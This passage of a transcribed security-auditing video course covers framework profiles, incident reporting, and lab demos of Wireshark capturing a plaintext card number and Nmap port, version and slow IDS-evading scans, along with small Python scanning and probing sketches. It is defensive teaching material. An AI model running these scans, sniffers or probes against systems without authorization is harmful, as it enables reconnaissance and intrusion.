constantly changing as threats and technologies change within the business. Organizations take their business
requirements, risk tolerance, and
[Video description begins] Screen title: Framework Profile [Video description ends]
resources and align those with the functions, categories, and subcategories in the framework to create a
framework profile. The goal of the profile is to act as a roadmap for reducing cyber security risk while keeping
in line with the business goals, regulatory requirements, industry best practices, and risk management
priorities. Organizations may choose to have multiple profiles. For example, there could be a profile created
that describes the current state of risk management within the company, and a profile that represents the
desired risk management goals for the company. In this scenario, the current profile is used to identify areas
that need to be improved upon to reach the cyber security risk management goals of the organization. In this
video, you learned about cyber security auditing concepts.
Upon completion of this video, you will be able to describe how to perform a cyber security assessment.
Objectives
[Video description begins] Topic title: Cyber Security Assessment. Your host for this session is Glen E.
Clarke. [Video description ends]
In this video, you'll learn how to perform a cyber security assessment. The cyber security framework is
designed to help organizations identify, assess, and manage cyber security risk within the organization. The
framework is designed to be a complement to existing processes and be used as an overlay of the existing
processes to help identify gaps in the company's cyber security risk management practices.
The framework is designed to work with new cyber security programs or to integrate into existing programs to
improve the security posture of an organization. When assessing security, the framework is designed to be
applied throughout the life cycle phases of plan, design, build or buy, deploy, operate, and decommission. The
plan and design phases of the system life cycle should always account for cyber security goals within the
organization. The framework allows for the cyber security practices to evolve over the life cycle. The
important point to remember is that the cyber security design should always match the needs and risk tolerance
of the organization, as specified in the framework profile.
[Video description begins] Screen title: Cyber Security Practices [Video description ends]
When implementing the cyber security framework, there are a number of best practices that should be
followed. First, the framework should be used to compare an organization's current cyber security activities
with those outlined in the framework core. Remember to create a current profile, so you can determine how to
achieve the outcomes found in the core functions, categories, and subcategories.
Once the current profile is created, you can then determine the organization's compliance level with its
security goals and risk tolerance level. From there, the organization
can develop an action plan to improve the existing cyber security practices and reduce cyber security risk. And
finally, the company may find that after comparing the current profile with their desired cyber security goals
and risk tolerance level, that they're over investing in resources in a specific area. The organization can use this
information to reprioritize resources and adjust as needed.
[Video description begins] Screen title: Establishing a Cyber Security Program [Video description ends]
If an organization does not have a security program in place, they can follow the steps to create a security
program. If a security program does exist, the company can use these steps to improve the security program
and should do so on a recurring basis. Step one is to prioritize and scope. In this step, the organization
identifies its business goals and high level organizational priorities. After understanding its goals, the
organization can make strategic decisions regarding cyber security implementations. If your organization has
different lines of business, you can create a different profile for each line of business.
Step two is to orient. After determining the scope of the cyber security program, the organization identifies the
systems and assets, regulatory requirements, and overall risk approach. After identifying the systems and
assets, the company can identify threats and vulnerabilities against each of those systems and assets. Step three
is to create a current profile. At this point, the organization develops a current profile by specifying the
category and subcategory outcomes from the framework core that are currently in place. Next, we have step
four, conduct a risk assessment. With the risk assessment, you
analyze the operational environment and identify the likelihood of a cyber security event and the impact the
event would have if it occurred.
Step five of establishing a cyber security program is to create a target profile. The target profile focuses on the
assessment of the framework categories and subcategories which describe the organization's desired cyber
security outcomes. It's important to note that the framework is designed to be adaptive. So if the company
wants to develop their own categories and subcategories, they can. Next, you want to determine, analyze, and
prioritize gaps. At this phase, you compare the current profile to the target profile to determine gaps in the
cyber security practices. This helps you create a prioritized action plan to address gaps in achieving the
outcomes of the target profile.
You would then determine the resources and funding necessary to address the gaps in cyber security practices.
Step seven is to implement the action plan. In this phase, you determine which actions to take to address the
gaps and adjust the current cyber security practices in order to achieve the target profile. The framework gives
informative references in regards to the categories and subcategories, but know that companies should identify
any standards, guidelines, and practices that work best for their organization.
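Steps five and six, comparing a current profile against a target profile to find gaps, amount to a simple set comparison. A minimal Python sketch, using hypothetical subcategory identifiers purely for illustration:

```python
# Hypothetical profiles expressed as sets of subcategory outcomes; the identifiers
# below are illustrative, not a real assessment.
current_profile = {"ID.AM-1", "PR.AC-1", "DE.CM-1"}
target_profile = {"ID.AM-1", "PR.AC-1", "PR.DS-1", "DE.CM-1", "RS.RP-1"}

gaps = target_profile - current_profile              # outcomes we want but don't have yet
over_investment = current_profile - target_profile   # outcomes we have but didn't prioritize

print("Gaps to prioritize:", sorted(gaps))
print("Possible over-investment:", sorted(over_investment))
```

The gaps set feeds the prioritized action plan in step seven, and the reverse difference is one way to spot the kind of over-investment mentioned earlier.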
[Video description begins] Screen title: Self-Assessing Cyber Security Risk [Video description ends]
In order to be successful at self-assessing cyber security risk, an organization must have a clear understanding
of its objectives and how those objectives relate to the cyber security outcomes. You can perform a self-
assessment of the effectiveness of the cyber security framework outcomes by, first, making a decision on the
target implementation tiers.
Then evaluating the organization's approach to risk management by determining the current implementation
tiers. Create target profiles to prioritize the framework outcomes. Determine the steps you need to take in order
to achieve the desired cyber security outcomes by comparing the current profile against the target profile. And
finally, determine the degree of implementation for controls or technical guidance listed in the informative
references. In this video, you learned about performing a security assessment.
After completing this video, you will be able to describe audit review, analysis, and reporting.
Objectives
[Video description begins] Topic title: Cyber Security Reporting. Your host for this session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about cyber security reporting and incident response. Cyber security reporting is
an important aspect of your security program and should include auditing results from monitoring activities,
such as user account usage, remote access, wireless connectivity, mobile device connections, changes to
configuration settings, and usage of maintenance and administrative tools. When incorporating cyber security
reporting into your security program, you should first review the necessary audit records.
This means that you will need to ensure that auditing is enabled in any environment where you would like
audit records to be made. You should also decide on the types of events to audit and whether you care about the
success or failure of those events. For example, do you care to know about the success of group management
or the failure of group management? After collecting the audit data, you'll need to analyze the audit records for
anomalies that could represent a security incident. When analyzing audit data, you're looking at the types of
events, the dates and times, the user account that was used, the computer name that was used, and any file
information.
You should also correlate the audit data with other audit information such as physical access logs. You will
then report on the findings. Auditing can gather a lot of information. So when reporting on the findings, you
should filter the information out to only contain necessary data in the report.
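As a loose illustration of filtering audit records down to only the necessary data, here is a small Python sketch; the record fields and the "after hours" rule are assumptions, since the video doesn't prescribe a specific format or anomaly:

```python
from datetime import datetime

# Hypothetical audit records; in practice these would come from your event logs or SIEM.
records = [
    {"time": "2024-04-01 02:14", "event": "logon failure", "user": "svc-backup", "host": "SRV01"},
    {"time": "2024-04-01 02:15", "event": "logon failure", "user": "svc-backup", "host": "SRV01"},
    {"time": "2024-04-01 09:05", "event": "group change", "user": "jsmith", "host": "DC01"},
]

def after_hours(record, start_hour=7, end_hour=19):
    """Flag activity outside an assumed 07:00-19:00 business day."""
    hour = datetime.strptime(record["time"], "%Y-%m-%d %H:%M").hour
    return hour < start_hour or hour >= end_hour

# Keep only the records that match the anomaly we care about, so the report
# contains just the necessary data.
for record in filter(after_hours, records):
    print(record["time"], record["event"], record["user"], record["host"])
```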
[Video description begins] Screen title: Incident Reporting [Video description ends]
Organizations should have a formal incident reporting policy that clearly specifies when security incidents
should be reported and who they should be reported to. Companies should be clear about requiring
personnel to report suspected security incidents within the time period specified in the policy. For
example, a company may require that security incidents be reported within two hours of their discovery. The
policy should also specify who to report the security incidents to. For example, companies may require that
security incidents are reported to the security officer.
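That two-hour window is easy to check mechanically once discovery and reporting timestamps are recorded. A trivial Python sketch, with made-up timestamps:

```python
from datetime import datetime, timedelta

REPORTING_WINDOW = timedelta(hours=2)  # the example window from the policy above

discovered = datetime(2024, 4, 1, 10, 0)   # made-up discovery time
reported = datetime(2024, 4, 1, 13, 30)    # made-up reporting time

delay = reported - discovered
if delay > REPORTING_WINDOW:
    print(f"Policy breach: incident reported {delay} after discovery")
else:
    print("Incident reported within the policy window")
```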
[Video description begins] Screen title: Incident Reporting Controls [Video description ends]
There are a number of best practices as they relate to incident reporting controls. First, organizations should look
to use technologies or solutions that help automate the reporting of security incidents. If a fully automated
solution cannot be found to suit your needs, look to a system that will help you report the incidents. When
reporting on a security incident, be sure to report on the vulnerability that helped the security incident occur.
For example, if the security incident involved a hacker gaining access to a system through a vulnerable piece
of software, include in the report the vulnerability, and potentially the fix to that vulnerability, if one exists.
The organization should report the security incident to other organizations in the supply chain of the
information system that's involved in the security incident or its components.
[Video description begins] Screen title: Incident Response Plan Guidelines [Video description ends]
It is imperative that organizations implement an Incident Response Plan to ensure that all personnel know their
responsibilities during a security incident. The Incident Response Plan provides the organization with a
roadmap for incident response tasks that need to be performed during a security incident. It also describes the
existing incident response capabilities of the organization and outlines, at a high level, how incident response
integrates into the overall security program for the organization.
The Incident Response Plan should be designed to meet the unique requirements of the organization, which
relate to the organization's mission, size, structure, and functions. The Incident Response Plan should also
define what security incidents are reportable. Personnel should understand what incidents to report and who to
report them to. The Incident Response Plan should also provide metrics for measuring the incident response
capabilities within the organization. It should identify and define the resources and management support that
are needed to effectively maintain and evolve incident response within the organization. And finally, the
Incident Response Plan should be reviewed and approved by the security officer. In this video, you learned
about cyber security reporting and incident response.
[Video description begins] Topic title: Network Security Auditing. Your host for this session is Glen E.
Clarke. [Video description ends]
In this demonstration, we'll take a look at how to use Wireshark, a tool that you can use to analyze network
traffic, either to help troubleshoot the network or look for suspicious network traffic. Now before we get
started with the demo, I first want to mention that you can download Wireshark from the www.wireshark.org
website. And you can install it on your system. They have different downloads for different platforms. So for
instance, you can install it on Linux, Windows, or the Mac itself.
They also have a portable version that you can use as well. So I've already got it installed on the system. I am
using my Kali Linux system. So to launch Wireshark from my Kali Linux system, I go up to Applications and
down to Sniffing and Spoofing. So what's kind of nice here about Kali Linux is they have a number of security
tools built in and they have them organized by the type of tool. So Wireshark is a packet sniffer. It’ll capture
and analyze network traffic for us. And you can see over here on the right, I have many different types of
sniffing and spoofing tools. So I’m going to launch Wireshark.
[Video description begins] The Wireshark interface displays on the screen. It contains a search field
underneath the heading "Capture". Below the field is a list of network interfaces including "eth0", "any", and
"Loopback: lo". [Video description ends]
Once Wireshark is launched, the first thing that you'll notice is that you have a kind of a Welcome to
Wireshark page. And I have a list here of network interfaces. And what I love here is they're showing you kind
of live traffic on the network to help you identify which network interfaces are actually seeing traffic right
now. So what you do is pick the interface that you want to monitor traffic from. In my case, it is eth0.
If I hover over it, you can see the IP address of the interface. So if you're not quite sure what interface you
actually want to use but you know the IP address of your system, you could hover over each of these. And a
little tool tip will pop up and give you the IP address information. So to start capturing on an interface, what you
do is double-click on that interface. So I double-clicked on the eth0 interface. You can see up top
here that I have a stop button and that's how I'm going to stop capturing but I'm currently capturing traffic.
[Video description begins] The host points to the red box in the "Capturing from eth0" window. The Packet
List Pane displays various packets underneath the following column headers: No., Time, Source, Destination,
Protocol, Length, and Info. [Video description ends]
And you can see up here in the title where it says Capturing from eth0, and you can actually see the packets
getting collected here. So there's a number of our broadcast messages. Now what I'm going to do is I'm just
going to move that to the right or shrink it down and move it to the right. Because just for this demo, I set up a
little website to type in credit card number.
[Video description begins] He opens the Mozilla Firefox web browser. [Video description ends]
And basically, what I want to do is capture that and then show you how I can find that very easily. So I'm
going to navigate to the website. The website is 192.168.67.130. And here's my little Welcome to the Website
Enter the credit card number. So I'm going to do 998877 is my credit card number. And I hit the little Buy
button, and it submits the credit card number up to the server. It processes the request and says hey, we're
going to go and bill that credit card number. So there's an example of some traffic that I want to be able to
capture. So I'm going to close that down and go back to my packet capture. And first thing I'm going to do here
is I'm going to stop capturing traffic.
[Video description begins] He clicks the red box. [Video description ends]
Now, one of the things about network monitoring is that you're capturing a lot of packets. And there's a lot of
traffic here that I actually don't want to work with right now. So you can see there's all these broadcast packets,
right? If I scroll down, we'll start seeing all the different packets from all kinds of different systems on the
network. So the first thing that I like to do is apply a filter for the type of traffic that I would like to see.
So what's kind of nice is you can capture everything and then filter off for the stuff that you want to look for.
So right now, I care about monitoring traffic that's between the .130 system and the .131. So what you can do
is, you can come up top here and you can type out an expression that applies what we call a display filter. A
display filter filters what we see, versus a capture filter, which filters what gets captured. So I've captured
everything, but I want to filter what's being displayed. And here you write an expression. So I'm going to do
ip.host == 192.168.67.130 and ip.host == 192.168.67.131; there's IntelliSense-style autocomplete that pops up as you type.
[Video description begins] He types the following text in the filter toolbar: ip.host == 192.168.67.130 and
ip.host == 192.168.67.131. [Video description ends]
Now, the reason why I'm choosing these two, and I hit Enter there. The reason why I'm choosing these two IP
addresses is because my Kali Linux system is the 131, and the website that I was on was 130. So I wanted to
see traffic where the packets are actually from both of these IPs. So you can see here we have the source IP
addresses 131, destination is 130, 130 to 131. So I'm only seeing traffic where these two systems are involved
in the traffic, which is very useful.
Now, a quick little tour of the interface, so there's kind of three main panes in Wireshark. The top pane here is
where the packets are displayed. So I can see each of the different packets and I can highlight each packet if I
wanted to, going down through. And so this is kind of a main area that I interact with. When you select a
packet, it shows the packet details in this middle pane here.
[Video description begins] He points to the Packet Details Pane. [Video description ends]
And the packet details are organized by these different sections to make it easy to look at the information.
Now, the packet details are also in hexadecimal format
[Video description begins] He points at the Packet Byte Pane. [Video description ends]
and also in ASCII format down here. So this is what we call the hex pane, right? Now, just to kind of show you
that the hex pane will change as I'm highlighting data, so if I highlight the different packets, notice this hex
pane changing, right? So that's the hexadecimal information. Now, most of us don't really know how to read
this hex pane directly.
So what the creators of Wireshark have done is they've interpreted this hexadecimal data to create the detailed
pane for us to look at, right? So it's a little bit easier to look at and read the information from the detailed pane.
So the first thing I do when using a tool like Wireshark is I focus on the top pane where the packets are listed.
And what I do is I look at the protocol column. So notice that we do have the packet number, the time since the
capture started, the source IP address of the packet.
So this packet came from .131 and its destination IP is set to .130. You can see the protocol, you can see the
size of the packet. And I love this Info column. The Info column is information that is very useful to know
about the packet. That information that's in this Info column, you could actually locate down at the bottom here. But
what they do is they take some key information and throw it in that Info column. And I'll show you
what I mean here in a second. But the idea is as you'll read through this, a lot of times I'll look at the protocol
first. Because when you're analysing traffic, you have an idea what you're looking for.
So our focus is to find that credit card number that was submitted. So that's going to be HTTP traffic. So we'll
look for the HTTP protocol. But before we do that, I just want to give you a quick little overview of the
conversation that we've captured. So notice that the protocol is TCP. And in the info, what I look for here is,
they have a SYN flag. Then the next packet is the SYN-ACK, and the next packet is the ACK. So what this is,
is the TCP three-way handshake that happened when I visited the website, right? So a TCP
three-way handshake occurred over port 80. Once the handshake completes, then the protocol switches to
HTTP because now I'm talking to the web server, right? Now, let's go to the packet that I want to analyze here,
and that is the credit card getting posted.
So I'm not interested in this HTTP GET request, because that means I'm requesting the download from the web
server. I'm looking for somebody uploading data. So I'm looking for an HTTP packet that has a POST request,
see that POST request there? So I select that. And the idea is once you find a packet of interest, then you start
looking at this details pane.
[Video description begins] The Packet details pane currently displays the following expandable headers:
Frame 187, Ethernet II, Src, Internet Protocol Version 4, Src, Transmission Control Protocol, Src Port,
Hypertext Transfer Protocol, and HTML Form URL Encoded. [Video description ends]
And I can see the frame details. If I expand that out, I can see things like the time that the packet occurred, the
size of the packet. If I collapse that down, I've got my Ethernet header, the Ethernet header is your layer two
information. So this contains the MAC address, so I can see the source MAC address and the destination MAC
address. Just a little heads up here. Notice that when I select the source MAC address here, I can see the
MAC address 00:0c:29:f4:a4:af. But notice that when I select that, down at the bottom in the hex pane, it
highlights where that data is in the hex pane.
So if I go and highlight the destination MAC address, notice that it changed the highlighted area within the hex
pane. So it's kind of nice. So that's where I can locate the source and destination MAC address. So if I'm
analyzing a security incident, I would record this information. Then we've got the IP header and the IP header
shows things like your source and destination IP address. So if I look for that here, there's our source and
destination IP address. So again, you know I'm kind of analyzing the traffic and recording that information.
Then we've got our TCP header. And in the TCP header, you'll see all the TCP data, such as the source and
destination port. So the source port used by the web browser was 38190.
The destination port is port 80 because it's headed to a web server. And then down below that, you'll have what we
call the application data. In this case, it's an HTTP packet. So I do see an HTML
section and when I expand that out, what I want you to notice is there's the credit card number txtCreditCard is
998877, right? So I can select that. Notice that it highlighted that area down in the hex pane and also in the
ASCII pane. Notice the ASCII window down here, it's highlighted it. So let me go back and highlight that
there. So that's kind of the idea of using Wireshark as a network analyzer and to help you analyze network
traffic and hopefully discover any kind of security incidents that may occur.
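If you wanted to script the same kind of inspection outside the Wireshark GUI, one option is the third-party scapy library. This is only a rough sketch, not part of the demo: it assumes scapy is installed, that you have privileges to sniff, and it reuses the interface name, addresses, and txtCreditCard field from the demo:

```python
# Requires the third-party scapy package and privileges to sniff; the interface name,
# addresses, and the txtCreditCard field are taken from the demo as assumptions.
from scapy.all import IP, Raw, TCP, sniff

def flag_sensitive_post(pkt):
    # Look for an HTTP POST whose payload contains the form field from the demo.
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        payload = bytes(pkt[Raw].load)
        if payload.startswith(b"POST") and b"txtCreditCard" in payload:
            print("Possible sensitive POST from", pkt[IP].src, "to", pkt[IP].dst)

# The BPF string acts like a capture filter, narrowing traffic to the two demo hosts.
sniff(iface="eth0",
      filter="host 192.168.67.130 and host 192.168.67.131 and tcp port 80",
      prn=flag_sensitive_post, store=False)
```

The BPF string passed to filter= plays the role of a capture filter, while the check inside the callback is closer to the display-filter step performed in the demo.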
[Video description begins] Topic title: Perimeter Security Auditing. Your host for this session is Glen E.
Clarke. [Video description ends]
In this demonstration, we'll take a look at how to use Nmap, a security scanner that you can download from
nmap.org. Or it's available in a lot of Linux platforms by default. Nmap can be used as a port scanner that's
used to identify systems on the network and the ports that those systems have open and potentially the software
that's running on those ports. So it's a great tool, as a network analyst, that I can use to scan my own network
and discover what systems exist and what ports are open on those systems.
But also, as a security professional you know performing, let's say a penetration test, I can use this tool to help
discover systems that might be vulnerable on the network. So let's take a look at using Nmap as a port scanner.
So the first thing I'm going to do on my Kali Linux system is I'm going to go into a terminal session. So I hit
the little Terminal button over here.
[Video description begins] An instance of Windows Terminal titled "root@kali:~" displays. The command
prompt in the interface reads: "root@kali:~#" [Video description ends]
And let me just size this window out, so that we can see everything pretty well. So the first thing is that Nmap
is used to perform a number of different scans. So I can do an nmap -s (a lowercase s), which means scan. Now,
there's different types of scans, so the next character specifies the type of scan. So for instance, I can do what
we call a SYN scan, which is very common. What a SYN scan is, is that it scans the ports on a system. But it
only does a partial three-way handshake. It doesn't do a full three-way handshake. Versus a TCP connect scan,
which I can use with a capital T. It does a full three-way handshake with each of the ports.
And the concept of the TCP three-way handshake or TCP connect scan I should say, is that if the tool can do a
full three-way handshake with the port and make a connection, then the port must be open, so it's considered
very reliable. When the results come back, you can rely on those results because it established a full-fledged
connection. Versus a SYN scan doesn't do a full three-way handshake. So in theory, it's not as reliable as a
TCP connect scan. But keep in mind, in this day and age, it's fairly reliable. Now the benefit of doing the SYN
scan is that you are generating less traffic, right? Because you're not doing the full three-way handshake.
A lot of security professionals will use SYN scans a lot, over maybe the TCP connect scan. But both are good,
the results come back the same. So after that, you specify the IP address. So you can specify 192.168.67.130 as
the Windows machine I want to do a port scan on. So notice that you can specify the IP address of a single
system or what's kind of nice, you could actually do the whole network, so you could do 192.168.67.0/24. So if
you know the network range and how to specify the network range in the CIDR notation, you can do that, so
that's what I'll do first. I am going to focus on the 130 system, but let me first show you that I can do a full scan
across the network.
[Video description begins] He enters the following command: nmap -sS 192.168.67.0/24 [Video description
ends]
So it will take a few minutes here. It won't take too long, because there's not a lot of systems. It should pick up
on the 130 system at least, so it finished the scan. And if I scroll up and take a look at the results. So it did pick
up on 168.67.1, which is our router. It picked up on 67.2, and there's the 67.130. Now notice that the 67.1
system, it has a few ports that it found open. The 67.2 has even fewer ports, but when I scroll down and take a look
at that 67.130, there's quite a few ports open on 67.130. So we can see that the telnet port is open, the web port.
So there's a web server running on that system. We can see that it's got the 135, 139, and 445, so it's probably a
Microsoft Windows machine. Because those are ports found on Windows boxes. It does have port 3389, which
is the RDP port, so RDP is enabled on it, right? So there's quite a few ports that are open on that system, so
that's an important target there. So that was the whole network scan. Now for the rest of the examples, I am
going to focus on just that 130. Just to cut down on the output, so I don't have to scroll through the screen.
[Video description begins] He clears the screen and then enters the following command: nmap -sS
192.168.67.130 [Video description ends]
So I can do a SYN scan of just the 130, and notice that it comes back and says okay, here's the results
for 130. The host is up and running, so what happens is Nmap does a ping first to see if the system is up and
running. And if it is, then it does the port scan. And then here's our different ports that are open. Now that's a
TCP port scan, right, SYN scan. We can also do, I'm just going to use my up arrow here, just to show you the
different types of scans. I'll do an sT, remember, that's a TCP connect scan.
[Video description begins] He clears the screen and then enters the following command: nmap -sT
192.168.67.130 [Video description ends]
And again, the results aren't really any different. It's just underneath the scenes, how the scan was performed,
right? So that did a three-way handshake with each port. Now, let's do a UDP port scan. If I want to do a UDP
scan, that's a -sU; -s means scan, and the next capital character specifies the type of scan, so this is going to be a
UDP port scan.
[Video description begins] He clears the screen and then enters the following command: nmap -sU
192.168.67.130 [Video description ends]
Okay, I'm not sure why that's taking so long. I'm going to do a Ctrl+C to stop that scan. But that's a UDP port
scan, so it should come back with any UDP ports that are open, and I don't suspect there's any UDP ports open
on that system. So the next thing that I want to show you is going back to the SYN scan. I'm going to hit my up
arrow key here. And I'm looking at the SYN scan; remember, the SYN scan came back with all the
ports that were open on that .130 system.
[Video description begins] He clears the screen and then enters the following command: nmap -sS
192.168.67.130 [Video description ends]
Now let's say you're the security person within the organization. Management comes up to you and says, you
know there's a huge exploit against the remote desktop protocol. Do we have any systems running RDP? So
what's kind of cool is as a security professional, you can use Nmap to discover or target specific ports. So I'm
going to do a SYN scan and I'm going to add a -p here and I'm going to say 3389. So management wants to
know, do we have any systems running Remote Desktop? Now in my example, I'm just going to target it
against the 130 system. But we could do it against the whole network, which is what you do in that scenario.
[Video description begins] He clears the screen and then enters the following command: nmap -sS -p 3389
192.168.67.130 [Video description ends]
And notice that the output comes back showing just that 3389 is open, which is kind of nice. You could also
list multiple ports. So for instance, with nmap -p, you could say go scan port
3389, and port 80, right? So if you had specific ports that you were looking for, you could list them as comma-
separated values.
[Video description begins] He enters the following command: nmap -sS -p 3389,80 192.168.67.130 [Video
description ends]
The other thing that is important as well is I mentioned that Nmap does a ping first. And a lot of times, systems
that don't respond to pings may have ports open, because maybe the ping message is being blocked by a
firewall on the system. So you can tell Nmap not to do pings. Keep in mind, this could potentially
increase the time that it takes to perform the port scan. So I do a -Pn, for no ping.
[Video description begins] He clears the screen and enters the following command: nmap -sS -Pn -p
3389,80 192.168.67.130 [Video description ends]
Hit Enter, and that wasn't too bad. I'm just scanning Port 80. So I told it not to do a ping. The next command
that I want to show you is you can also do what we call a version scan. So let me go back to this -sS. So if I
wanted to, I could try to find out the version of the software that's running on those ports. Now this will take a
little bit longer because it's essentially doing like a banner grab to find out, okay, port 80 is open. Well what's
the web server software that's running behind port 80. Is it an Apache web server, is it an IIS web server? That
kind of idea.
[Video description begins] He clears the screen and enters the following command: nmap -sV -p
3389,80 192.168.67.130 [Video description ends]
So you can see here that it's finished the version scan; it took probably about two minutes. And it shows
that Port 80 is open. It's an HTTP service. And notice that we have a new version column. So it's a Microsoft
IIS and it tells you the version of IIS, so that's 7.5. And again, here it shows Port 3389 but notice that they don't
really have any version information for that. So like I said, you can attempt to find the version out with that
-sV. Again, great for pen testers. If you're assessing the security of the organization and you've been authorized to
perform a penetration test, you'd want to not only discover the ports that are open, but you'd also want to know
the software that's running behind those ports. So now I can start researching how to exploit an IIS 7.5.
The last command that I want to mention for Nmap is, let me go back to a SYN scan here. You can also add in
if you wanted to, a -T, and then a number from zero through five. And basically what this is designed to do is to
change the timing of the scan. So for instance, let me get rid of the ports. That way it does all the default ports
or common ports. So I'm going to be scanning the system on all the common ports. And if you suspect that the
network has an intrusion detection system, you may want to slow down the scan, right? So you could go and do
a T0, specifying that you want to go into what we call paranoid IDS evasion mode, which slows the scan down
to hopefully avoid an IDS picking up on all of your port scanning traffic, right? So this will slow the scan
down a little bit,
[Video description begins] He clears the screen and enters the following command: nmap -sS -T0
192.168.67.130 [Video description ends]
in hopes that we have that evasion. You can also do something like a -T4, which is the exact opposite. It's
what we call an aggressive speed scan. And you use it in scenarios where you want to speed up the process of
performing the scan and you're not worried about detection. So that T0 scan should still be running there. It'll
come back with the same kind of results; it'll just take longer. There's a number of other switches with Nmap. It's a small
program, but it has a lot of options with it. So it's a very cool little tool to use as a network professional and as
a security professional.
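To make the TCP connect scan concept concrete, here is a bare-bones Python sketch that does what nmap -sT does at its core: attempt a full three-way handshake on each port and report the ones that accept. The target address and port list mirror the demo and are examples only; as with Nmap, only scan systems you're authorized to test:

```python
import socket

# A bare-bones TCP connect scan in the spirit of nmap -sT: attempt a full three-way
# handshake on each port and report the ones that accept the connection.
target = "192.168.67.130"
ports = [21, 23, 80, 135, 139, 443, 445, 3389]

for port in ports:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(1.0)
        # connect_ex returns 0 when the handshake succeeds, i.e. the port is open.
        if s.connect_ex((target, port)) == 0:
            print(f"{port}/tcp open")
```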
After completing this video, you will be able to describe how to perform web application auditing and secure
web applications and websites.
Objectives
describe how to perform web application auditing and secure web applications and websites
[Video description begins] Topic title: Web Application Auditing. Your host for this session is Glen E. Clarke.
Screen title: Web Application Audit Tools [Video description ends]
In this video, you will learn about Web Application Auditing. Web applications have taken over the
application platform world for both Internet and Intranet applications. With Internet applications, you're
extending your potential audience to the entire world. So it is important to assess the security of the web
applications. There are a number of tools out there that allow us to assess the security of our web applications
such as Burp Suite or the web application framework. When looking to web application audit tools, you want
to use tools that have the following core capabilities.
First, the web application audit tools should be able to discover the web applications that exist on a system or
even the entire network. This is important because organizations do forget about applications running on
systems, and if such an application has vulnerabilities, it could make the entire system vulnerable to attack. Once the web
applications are discovered, the web application audit tools should be able to find vulnerabilities within those
running applications.
A good assessment tool will give you the capability to perform authenticated and non-authenticated
vulnerability scans on the system, looking for issues such as cross-site scripting vulnerabilities, SQL injection
vulnerabilities, and information leakage. Using a web application audit tool on web applications in the development environment
or staging environment can help identify security issues before deployment. But also be sure to perform an
audit of the web application in production as well.
[Video description begins] Screen title: Vulnerability Scanner Features [Video description ends]
With a wide range of tools out there, it's important to understand some of the features that vulnerability
scanners should have as a basic feature set. The first is the ability to determine the web application attack
surface. This involves the tool having a crawler component that crawls through the site and identifies all of the
entry points, or pages and directories, of the web application. This is a crucial feature because without
identifying the entry points, the tool wouldn't be able to discover the vulnerabilities.
You want to choose an easy to use vulnerability scanner that does not need a number of configuration settings
applied before you can use it. Having a tool that can automatically detect the most common vulnerability
scenarios is an important feature. You also want to select a vulnerability scanner that can accurately identify
web application vulnerabilities with a low number of false positives. A false positive with vulnerability
scanners is when the scanner says there's a vulnerability but really, there's not. You also want to have a
vulnerability scanner that supports automation. Automation allows you to script or automate a security scan
without having to manually run each test yourself.
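As a loose example of what "supports automation" can look like in practice, the sketch below drives a scanner from a script and post-processes its machine-readable output. It uses Nmap (covered earlier in this course) only because its XML output is easy to parse; a web vulnerability scanner with a command-line interface or API could be scripted the same way. It assumes nmap is installed, and the target address is just the demo address:

```python
import subprocess
import xml.etree.ElementTree as ET

# Drive a scanner from a script and post-process its machine-readable output.
# Assumes nmap is installed; "-oX -" writes XML to standard output.
result = subprocess.run(
    ["nmap", "-sV", "-oX", "-", "192.168.67.130"],
    capture_output=True, text=True, check=True,
)

root = ET.fromstring(result.stdout)
for port in root.iter("port"):
    state = port.find("state").get("state")
    service = port.find("service")
    name = service.get("name") if service is not None else "unknown"
    print(port.get("portid"), state, name)
```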
[Video description begins] Screen title: Identify Web Application Vulnerabilities [Video description ends]
In order to ensure the security of the web application, you must identify the web application vulnerabilities that
exist before a hacker exploits the vulnerabilities on you. This is why you should perform web application
vulnerability detection tasks throughout the entire software development life cycle instead of after it's deployed
to the web server. There are a number of different techniques you can use to identify the web application
vulnerabilities. First, you can use a black box security vulnerability scanner to scan the web applications and
identify vulnerabilities within the web application. This is a great starting point when assessing the web
application's security. You could also do a manual source code audit of the web application code to identify
secure coding issues within the application.
You could use an automated white box scanner where you're performing source code scans and reviews with
the audit as well. You could perform a manual security audit of the web server and the web application
configuration settings. And finally, you could perform penetration tests where you explicitly try to exploit and
compromise the applications running on the web server. Keep in mind, it's illegal to hack into any system you
don't have permission to test. So if you're going to perform a penetration test, be sure you have written
authorization from upper-level management or the business owner so that you can prove you had permission. When assessing the web
application security you would typically use multiple methods as each method complements one another. For
example, you could do an automated black box scan and a manual source code audit. The automated scan will
help reduce the time of assessing security, but the manual source code review will allow you to see logical
security issues within the application.
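A very small taste of what a black box scanner automates: inject a unique marker into an input and check whether the response reflects it back, a first hint of reflected cross-site scripting. The URL and parameter below are placeholders, and as the video stresses, only probe applications you're authorized to assess:

```python
import urllib.parse
import urllib.request

# A toy "black box" probe: send a unique marker in a query parameter and see whether
# the page reflects it back. The URL and parameter name are placeholders.
marker = "probe-a1b2c3"
url = "http://192.168.67.130/search?q=" + urllib.parse.quote(marker)

with urllib.request.urlopen(url, timeout=5) as response:
    body = response.read().decode(errors="replace")

if marker in body:
    print("Marker reflected in the response; check output encoding for this parameter")
else:
    print("Marker not reflected")
```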
[Video description begins] Screen title: Firewall Limitations [Video description ends]
Organizations today are placing a web application firewall in front of their web servers so that the web
application firewall can analyze the HTTP and HTTPS traffic to identify any malicious traffic or attacks. There
are some limitations to using only a web application firewall as your security strategy. First, it only prevents
known security vulnerabilities by comparing the HTTP traffic against known patterns. This means the web
application firewall is not a good tool to protect against zero-day attacks.
The web application firewall is only as good as the administrator who configures the firewall. If the web
application firewall is not configured properly, it may not be protecting your web applications against
malicious requests. The web application firewall simply blocks requests that are malicious. It does not fix web
application security issues. So it's important to identify and fix the vulnerabilities within the applications
themselves. The last point to make is that the web application firewall can itself have vulnerabilities that can be
exploited by a hacker.
[Video description begins] Screen title: Securing the Web Server [Video description ends]
One of the important points to remember about web application security is that the web server is not the only
software running on the machine. You have the operating system and you may have other components such as
a database server, an email server, or an FTP server. The following are some ways to help secure the web
server environment. First, be sure to uninstall unnecessary software and disable unnecessary services on the
system. For example, if you're not using the FTP service and one exists, disable it. Most devices and servers
today allow you to remotely access the system for administration purposes.
If you're not remoting into the system for administration, be sure to disable that functionality. If you are using
remote administration features, then secure it by limiting what IP addresses and protocols can be used to
remote into the server. Always use accounts with least privilege. Instead of having an admin account that can
perform all tasks, consider creating an admin account for each job role. For example, you could have a log
reader admin account that has the permission to read log files, but that account cannot make changes to the
